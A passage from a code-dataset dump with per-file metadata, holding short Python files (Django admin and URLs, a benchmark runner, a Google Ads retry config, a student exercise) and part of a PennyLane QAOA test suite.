blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
19078666f52c0a258fbe2e96b9bbd9da7c8386df | 65485cb1233e59b21dd5c5349cc88a015ad52661 | /ecommerce/store/admin.py | 39642d3a049ee140025f0b9107ed07f2c0ab8b88 | []
| no_license | danielmichaels/django-projects | 966929f889c4e31508b6bbcb728ef02f00549f0b | dc8ca4b9ca788dea6388b434e9d7744e1500128f | refs/heads/master | 2022-12-25T18:50:48.192647 | 2020-10-07T00:45:13 | 2020-10-07T00:45:13 | 289,652,384 | 0 | 0 | null | 2020-10-07T00:45:14 | 2020-08-23T09:13:00 | Python | UTF-8 | Python | false | false | 262 | py | from django.contrib import admin
from .models import Product, Order, OrderItem, Customer, ShippingAddress

# Expose every store model in the Django admin, preserving the original
# registration order.
for _store_model in (Product, OrderItem, Order, Customer, ShippingAddress):
    admin.site.register(_store_model)
| [
"[email protected]"
]
| |
a0b6217aff8ab3fd4a1a3074a6882d2a1be08888 | ac235a23f22be0d6f1818bb53902177f9969813a | /benchmarks/base/run.py | e2c0dda98b3f5b281160157a52897c485b5be00c | [
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | DataDog/dd-trace-py | f09d6d48c4c69aea68f999fc8a458ade5c6150cf | 1e3bd6d4edef5cda5a0831a6a7ec8e4046659d17 | refs/heads/1.x | 2023-09-01T20:25:26.746324 | 2023-09-01T18:54:37 | 2023-09-01T18:54:37 | 61,572,326 | 461 | 426 | NOASSERTION | 2023-09-14T20:38:57 | 2016-06-20T18:52:23 | Python | UTF-8 | Python | false | false | 993 | py | #!/usr/bin/env python3
import os
import subprocess
import sys
import yaml
def read_config(path):
    """Load the YAML benchmark configuration file at ``path``.

    Returns:
        dict: mapping of scenario name -> dict of scenario variables.
    """
    # Explicit encoding: YAML files are conventionally UTF-8, and the platform
    # default encoding is not guaranteed to be UTF-8 on every OS.
    with open(path, "r", encoding="utf-8") as fp:
        return yaml.load(fp, Loader=yaml.FullLoader)
def run(scenario_py, cname, cvars, output_dir, python_cmd="python"):
    """Run a single benchmark scenario as a subprocess.

    Args:
        scenario_py (str): path to the scenario script to execute.
        cname (str): name of the configuration case being run.
        cvars (dict): scenario variables, passed as ``--<name> <value>`` flags.
        output_dir (str): directory where ``results.json`` is appended.
        python_cmd (str): interpreter used to launch the scenario
            (default ``"python"``, matching the historical behavior).

    Returns:
        int: the subprocess exit code.
    """
    cmd = [
        python_cmd,
        scenario_py,
        # necessary to copy PYTHONPATH for venvs
        "--copy-env",
        "--append",
        os.path.join(output_dir, "results.json"),
        "--name",
        cname,
    ]
    for cvarname, cvarval in cvars.items():
        cmd.append("--{}".format(cvarname))
        cmd.append(str(cvarval))
    # subprocess.run replaces the manual Popen/wait pair and surfaces the
    # exit status to the caller (previously discarded).
    proc = subprocess.run(cmd, check=False)
    return proc.returncode
if __name__ == "__main__":
    # Expect exactly one CLI argument: the directory to write results into.
    argv = sys.argv
    if len(argv) != 2:
        print("Usage: {} <output dir>".format(argv[0]))
        sys.exit(1)
    output_dir = argv[1]
    print("Saving results to {}".format(output_dir))
    # Run every configured case from config.yaml against scenario.py.
    config = read_config("config.yaml")
    for case_name, case_vars in config.items():
        run("scenario.py", case_name, case_vars, output_dir)
| [
"[email protected]"
]
| |
6a872863bf9df20b9bac4c7fe703de788412ad50 | 7cd6950ab3034cb0cf403ee1b8410bf475360a8d | /cwl_tutorials/common_workflow_language_user_guide/venv/bin/venv/lib/python3.7/sre_compile.py | 0943d3b031fe0bb3f5ed669976db6a095d90e07e | []
| no_license | mr-c/george_murray | ef6d5f77a4f4c0b64cbc64534ce23d7546a3cee0 | 612c68c6b27ed2d8097f1309820ccdbb05530176 | refs/heads/master | 2022-09-20T11:12:58.582547 | 2019-08-15T19:32:34 | 2019-08-15T19:32:34 | 268,844,811 | 0 | 0 | null | 2020-06-02T15:55:27 | 2020-06-02T15:55:26 | null | UTF-8 | Python | false | false | 72 | py | /Users/George1/Downloads/programs/anaconda3/lib/python3.7/sre_compile.py | [
"[email protected]"
]
| |
71ea6cbad24da6e055d2aa9a4b7228bb842df0dd | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v4/services/mobile_app_category_constant_service_client_config.py | 1f790391c546b7cd2eddb5721b1b18609c8d5f0c | [
"Apache-2.0"
]
| permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | false | 837 | py | config = {
"interfaces": {
"google.ads.googleads.v4.services.MobileAppCategoryConstantService": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"GetMobileAppCategoryConstant": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
}
}
}
}
}
| [
"[email protected]"
]
| |
9722ea47a8adfd974d8062b96ef8ae7a8bdc811a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/125/usersdata/209/29350/submittedfiles/ap1.py | 7ec69941bd321159244fcfa47e54ea52e4520abb | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120 | py | A=float(input('Digite A:'))
B=float(input('Digite B:'))  # read B (A is read on the preceding line)
C=float(input('Digite C:'))  # NOTE(review): C is read but never used afterwards — confirm intent
if A>B:print('%F'%A)  # '%F' is the uppercase-float format; prints A when A > B
if A>B:print(B)  # NOTE(review): identical condition to the line above — likely meant B>A (or similar); confirm
"[email protected]"
]
| |
30f1f2705332c4549d124f51b50b3a9a72acb8d7 | 05c5f5bbc2ddfa850d4ae28148f176c5d63a4a7b | /tbkt/apps/sx_normal/urls.py | db94b6c0aa22cb4c88965821420b3e9b7610328a | []
| no_license | GUAN-YE/hd_api_djs | f7234643c06f47c03c348c7740266d45989c5e77 | 1f08cbfccc1ae2123d92670c0afed9b59ae645b8 | refs/heads/master | 2020-03-25T02:32:03.613535 | 2018-08-02T12:52:45 | 2018-08-02T12:52:45 | 143,294,216 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | # coding:utf-8
"""
2017数学常态活动
映射路径
"""
from django.conf.urls import url
from stu import views as stu_views
import views as com_views
# 学生
urlpatterns = [
url(r'stu/sign$', stu_views.r_sign), # 签到
url(r'stu/share$', stu_views.r_share), # 分享
]
# 活动公用方法
urlpatterns += [
url(r'^com/info$', com_views.r_info), # 用户积分详情
url(r'score/detail$', com_views.r_score_detail), # 用户积分信息
url(r'class/ranks$', com_views.r_class_rank), # 积分排名
url(r'award/display$', com_views.r_award_info), # 奖品静态展示
# 河南活动未下线,三门峡活动暂不用
url(r'award/winner$', com_views.r_award_winner), # 奖品静态展示
url(r'score/ranks$', com_views.r_score_rank), # 积分排名
] | [
"[email protected]"
]
| |
57d25441e5f38a14e1dfaee462ed68c7a1dd1d4d | af4f53500502faf8e0b3a97cf8f517fec80bdc5c | /tests/test_qaoa.py | dd68208c81ebf47c9dde2d5f3275f38bb3a72e56 | [
"Apache-2.0"
]
| permissive | quantshah/pennylane | c5590406674384bc6a26bd5dccc6619f9255242d | b904c966d124e66dbf82cc0b42f580db2d9a7cc1 | refs/heads/master | 2022-11-22T19:41:10.892782 | 2022-08-15T12:41:48 | 2022-08-15T12:41:48 | 355,849,206 | 0 | 0 | Apache-2.0 | 2021-04-08T09:48:31 | 2021-04-08T09:48:31 | null | UTF-8 | Python | false | false | 74,881 | py | # Copyright 2018-2020 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for the :mod:`pennylane.qaoa` submodule.
"""
import pytest
import itertools
import numpy as np
import networkx as nx
from networkx import Graph
import retworkx as rx
import pennylane as qml
from pennylane import qaoa
from pennylane.qaoa.cycle import (
edges_to_wires,
wires_to_edges,
_inner_net_flow_constraint_hamiltonian,
net_flow_constraint,
loss_hamiltonian,
_square_hamiltonian_terms,
cycle_mixer,
_partial_cycle_mixer,
out_flow_constraint,
_inner_out_flow_constraint_hamiltonian,
)
from scipy.linalg import expm
from scipy.sparse import csc_matrix, kron
#####################################################
# Module-level graph fixtures shared by the tests below: each topology is
# built twice, once as a networkx Graph and once as a retworkx PyGraph
# (retworkx edges carry an explicit payload, here an empty string).
# 3-node path graph 0-1-2.
graph = Graph()
graph.add_nodes_from([0, 1, 2])
graph.add_edges_from([(0, 1), (1, 2)])
graph_rx = rx.PyGraph()
graph_rx.add_nodes_from([0, 1, 2])
graph_rx.add_edges_from([(0, 1, ""), (1, 2, "")])
# Graph whose edges are not listed in consecutive node order.
non_consecutive_graph = Graph([(0, 4), (3, 4), (2, 1), (2, 0)])
non_consecutive_graph_rx = rx.PyGraph()
non_consecutive_graph_rx.add_nodes_from([0, 1, 2, 3, 4])
non_consecutive_graph_rx.add_edges_from([(0, 4, ""), (0, 2, ""), (4, 3, ""), (2, 1, "")])
# Another 3-node path graph.
g1 = Graph([(0, 1), (1, 2)])
g1_rx = rx.PyGraph()
g1_rx.add_nodes_from([0, 1, 2])
g1_rx.add_edges_from([(0, 1, ""), (1, 2, "")])
# 4-node path graph 0-1-2-3.
g2 = nx.Graph([(0, 1), (1, 2), (2, 3)])
g2_rx = rx.PyGraph()
g2_rx.add_nodes_from([0, 1, 2, 3])
g2_rx.add_edges_from([(0, 1, ""), (1, 2, ""), (2, 3, "")])
# Triangle with mixed-type node labels (string, int, float).
b_rx = rx.PyGraph()
b_rx.add_nodes_from(["b", 1, 0.3])
b_rx.add_edges_from([(0, 1, ""), (1, 2, ""), (0, 2, "")])
def catch_warn_ExpvalCost(ansatz, hamiltonian, device, **kwargs):
    """Build a ``qml.ExpvalCost``, asserting that its deprecation warning fires."""
    with pytest.warns(UserWarning, match="is deprecated,"):
        return qml.ExpvalCost(ansatz, hamiltonian, device, **kwargs)
def decompose_hamiltonian(hamiltonian):
    """Split ``hamiltonian`` into ``[coefficients, operator names, operator wires]``."""
    terms = hamiltonian.ops
    coeffs = list(qml.math.toarray(hamiltonian.coeffs))
    return [coeffs, [op.name for op in terms], [op.wires for op in terms]]
def lollipop_graph_rx(mesh_nodes: int, path_nodes: int, to_directed: bool = False):
    """Build a retworkx "lollipop": a complete mesh on ``mesh_nodes`` nodes with a
    path of ``path_nodes`` extra nodes hanging off it.

    When ``to_directed`` is true a directed mesh is generated and each path edge
    is added in both directions.
    """
    weights = [*range(mesh_nodes)]
    make_mesh = (
        rx.generators.directed_mesh_graph if to_directed else rx.generators.mesh_graph
    )
    g = make_mesh(weights=weights)
    # An empty range reproduces the original early return for path_nodes < 1.
    for offset in range(path_nodes):
        new_node = mesh_nodes + offset
        g.add_node(new_node)
        g.add_edges_from([(new_node - 1, new_node, "")])
        if to_directed:
            g.add_edges_from([(new_node, new_node - 1, "")])
    return g
def matrix(hamiltonian: qml.Hamiltonian, n_wires: int) -> csc_matrix:
    r"""Calculates the matrix representation of an input Hamiltonian in the standard basis.
    Args:
        hamiltonian (qml.Hamiltonian): the input Hamiltonian
        n_wires (int): the total number of wires
    Returns:
        csc_matrix: a sparse matrix representation
    """
    ops_matrices = []
    # Build the full 2**n_wires matrix for each term of the Hamiltonian.
    for op in hamiltonian.ops:
        op_wires = np.array(op.wires.tolist())
        # A tensor product is unpacked into its non-identity factors; a bare
        # observable is treated as a one-element list.
        op_list = op.non_identity_obs if isinstance(op, qml.operation.Tensor) else [op]
        op_matrices = []
        # Walk the wires in ascending order, inserting a 2x2 identity on
        # wires the term does not act on, so the Kronecker product below
        # respects the standard wire ordering.
        for wire in range(n_wires):
            loc = np.argwhere(op_wires == wire).flatten()
            mat = np.eye(2) if len(loc) == 0 else op_list[loc[0]].matrix()
            mat = csc_matrix(mat)
            op_matrices.append(mat)
        # Fold the per-wire factors left-to-right into one sparse matrix.
        op_matrix = op_matrices.pop(0)
        for mat in op_matrices:
            op_matrix = kron(op_matrix, mat)
        ops_matrices.append(op_matrix)
    # Weight each term by its coefficient and sum into the final matrix.
    mat = sum(coeff * op_mat for coeff, op_mat in zip(hamiltonian.coeffs, ops_matrices))
    return csc_matrix(mat)
class TestMixerHamiltonians:
"""Tests that the mixer Hamiltonians are being generated correctly"""
def test_x_mixer_output(self):
"""Tests that the output of the Pauli-X mixer is correct"""
wires = range(4)
mixer_hamiltonian = qaoa.x_mixer(wires)
mixer_coeffs = mixer_hamiltonian.coeffs
mixer_ops = [i.name for i in mixer_hamiltonian.ops]
mixer_wires = [i.wires[0] for i in mixer_hamiltonian.ops]
assert mixer_coeffs == [1, 1, 1, 1]
assert mixer_ops == ["PauliX", "PauliX", "PauliX", "PauliX"]
assert mixer_wires == [0, 1, 2, 3]
@pytest.mark.parametrize("constrained", [True, False])
def test_x_mixer_grouping(self, constrained):
"""Tests that the grouping information is set and correct"""
wires = range(4)
mixer_hamiltonian = qaoa.x_mixer(wires)
# check that all observables commute
assert all(
qml.grouping.is_commuting(o, mixer_hamiltonian.ops[0])
for o in mixer_hamiltonian.ops[1:]
)
# check that the 1-group grouping information was set
assert mixer_hamiltonian.grouping_indices is not None
assert mixer_hamiltonian.grouping_indices == [[0, 1, 2, 3]]
def test_xy_mixer_type_error(self):
"""Tests that the XY mixer throws the correct error"""
graph = [(0, 1), (1, 2)]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph object, got list"
):
qaoa.xy_mixer(graph)
@pytest.mark.parametrize(
("graph", "target_hamiltonian"),
[
(
g2,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
qml.PauliX(2) @ qml.PauliX(3),
qml.PauliY(2) @ qml.PauliY(3),
],
),
),
(
graph,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
],
),
),
(
non_consecutive_graph,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(4),
qml.PauliY(0) @ qml.PauliY(4),
qml.PauliX(0) @ qml.PauliX(2),
qml.PauliY(0) @ qml.PauliY(2),
qml.PauliX(4) @ qml.PauliX(3),
qml.PauliY(4) @ qml.PauliY(3),
qml.PauliX(2) @ qml.PauliX(1),
qml.PauliY(2) @ qml.PauliY(1),
],
),
),
(
g2_rx,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
qml.PauliX(2) @ qml.PauliX(3),
qml.PauliY(2) @ qml.PauliY(3),
],
),
),
(
graph_rx,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
],
),
),
(
non_consecutive_graph_rx,
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(4),
qml.PauliY(0) @ qml.PauliY(4),
qml.PauliX(0) @ qml.PauliX(2),
qml.PauliY(0) @ qml.PauliY(2),
qml.PauliX(4) @ qml.PauliX(3),
qml.PauliY(4) @ qml.PauliY(3),
qml.PauliX(2) @ qml.PauliX(1),
qml.PauliY(2) @ qml.PauliY(1),
],
),
),
(
Graph((np.array([0, 1]), np.array([1, 2]), np.array([2, 0]))),
qml.Hamiltonian(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
[
qml.PauliX(0) @ qml.PauliX(1),
qml.PauliY(0) @ qml.PauliY(1),
qml.PauliX(0) @ qml.PauliX(2),
qml.PauliY(0) @ qml.PauliY(2),
qml.PauliX(1) @ qml.PauliX(2),
qml.PauliY(1) @ qml.PauliY(2),
],
),
),
],
)
def test_xy_mixer_output(self, graph, target_hamiltonian):
"""Tests that the output of the XY mixer is correct"""
mixer_hamiltonian = qaoa.xy_mixer(graph)
mixer_coeffs = mixer_hamiltonian.coeffs
mixer_ops = [i.name for i in mixer_hamiltonian.ops]
mixer_wires = [i.wires for i in mixer_hamiltonian.ops]
target_coeffs = target_hamiltonian.coeffs
target_ops = [i.name for i in target_hamiltonian.ops]
target_wires = [i.wires for i in target_hamiltonian.ops]
assert mixer_coeffs == target_coeffs
assert mixer_ops == target_ops
assert mixer_wires == target_wires
def test_bit_flip_mixer_errors(self):
"""Tests that the bit-flip mixer throws the correct errors"""
graph = [(0, 1), (1, 2)]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph object"
):
qaoa.bit_flip_mixer(graph, 0)
n = 2
with pytest.raises(ValueError, match=r"'b' must be either 0 or 1"):
qaoa.bit_flip_mixer(Graph(graph), n)
@pytest.mark.parametrize(
("graph", "n", "target_hamiltonian"),
[
(
Graph([(0, 1)]),
1,
qml.Hamiltonian(
[0.5, -0.5, 0.5, -0.5],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(0),
],
),
),
(
g1,
0,
qml.Hamiltonian(
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
),
),
(
g1_rx,
0,
qml.Hamiltonian(
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
),
),
(
Graph([("b", 1), (1, 0.3), (0.3, "b")]),
1,
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25],
[
qml.PauliX("b"),
qml.PauliX("b") @ qml.PauliZ(0.3),
qml.PauliX("b") @ qml.PauliZ(1),
qml.PauliX("b") @ qml.PauliZ(1) @ qml.PauliZ(0.3),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(0.3),
qml.PauliX(1) @ qml.PauliZ("b"),
qml.PauliX(1) @ qml.PauliZ("b") @ qml.PauliZ(0.3),
qml.PauliX(0.3),
qml.PauliX(0.3) @ qml.PauliZ("b"),
qml.PauliX(0.3) @ qml.PauliZ(1),
qml.PauliX(0.3) @ qml.PauliZ(1) @ qml.PauliZ("b"),
],
),
),
(
b_rx,
1,
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25],
[
qml.PauliX("b"),
qml.PauliX("b") @ qml.PauliZ(0.3),
qml.PauliX("b") @ qml.PauliZ(1),
qml.PauliX("b") @ qml.PauliZ(1) @ qml.PauliZ(0.3),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(0.3),
qml.PauliX(1) @ qml.PauliZ("b"),
qml.PauliX(1) @ qml.PauliZ("b") @ qml.PauliZ(0.3),
qml.PauliX(0.3),
qml.PauliX(0.3) @ qml.PauliZ(1),
qml.PauliX(0.3) @ qml.PauliZ("b"),
qml.PauliX(0.3) @ qml.PauliZ("b") @ qml.PauliZ(1),
],
),
),
],
)
def test_bit_flip_mixer_output(self, graph, n, target_hamiltonian):
"""Tests that the output of the bit-flip mixer is correct"""
mixer_hamiltonian = qaoa.bit_flip_mixer(graph, n)
assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(target_hamiltonian)
"""GENERATES CASES TO TEST THE MAXCUT PROBLEM"""
GRAPHS = [
g1,
g1_rx,
Graph((np.array([0, 1]), np.array([1, 2]), np.array([0, 2]))),
graph,
graph_rx,
]
COST_COEFFS = [
[0.5, 0.5, -1.0],
[0.5, 0.5, -1.0],
[0.5, 0.5, 0.5, -1.5],
[0.5, 0.5, -1.0],
[0.5, 0.5, -1.0],
]
COST_TERMS = [
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.Identity(0),
],
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
[qml.PauliZ(0) @ qml.PauliZ(1), qml.PauliZ(1) @ qml.PauliZ(2), qml.Identity(0)],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
]
MIXER_TERMS = [
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MAXCUT = list(zip(GRAPHS, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES THE CASES TO TEST THE MAX INDEPENDENT SET PROBLEM"""
CONSTRAINED = [
True,
True,
True,
False,
False,
]
COST_COEFFS = [
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[0.75, 0.25, -0.5, 0.75, 0.25],
[0.75, 0.25, -0.5, 0.75, 0.25],
]
COST_TERMS = [
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
# [qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[0.5, 0.5, 0.25, 0.25, 0.25, 0.25, 0.5, 0.5],
[0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25],
[1, 1, 1],
[1, 1, 1],
]
MIXER_TERMS = [
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(1),
],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(2),
qml.PauliX(0) @ qml.PauliZ(1),
qml.PauliX(0) @ qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliX(1),
qml.PauliX(1) @ qml.PauliZ(2),
qml.PauliX(1) @ qml.PauliZ(0),
qml.PauliX(1) @ qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(0),
qml.PauliX(2) @ qml.PauliZ(1),
qml.PauliX(2) @ qml.PauliZ(1) @ qml.PauliZ(0),
],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MIS = list(zip(GRAPHS, CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES THE CASES TO TEST THE MIN VERTEX COVER PROBLEM"""
COST_COEFFS = [
[-1, -1, -1],
[-1, -1, -1],
[-1, -1, -1],
[0.75, -0.25, 0.5, 0.75, -0.25],
[0.75, -0.25, 0.5, 0.75, -0.25],
]
COST_TERMS = [
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(2),
],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[0.5, -0.5, 0.25, -0.25, -0.25, 0.25, 0.5, -0.5],
[0.5, -0.5, 0.25, -0.25, -0.25, 0.25, 0.5, -0.5],
[0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25, 0.25, -0.25, -0.25, 0.25],
[1, 1, 1],
[1, 1, 1],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MVC = list(zip(GRAPHS, CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES THE CASES TO TEST THE MAXCLIQUE PROBLEM"""
COST_COEFFS = [
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[0.75, 0.25, 0.25, 1],
[0.75, 0.25, 0.25, 1],
]
COST_TERMS = [
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
[qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)],
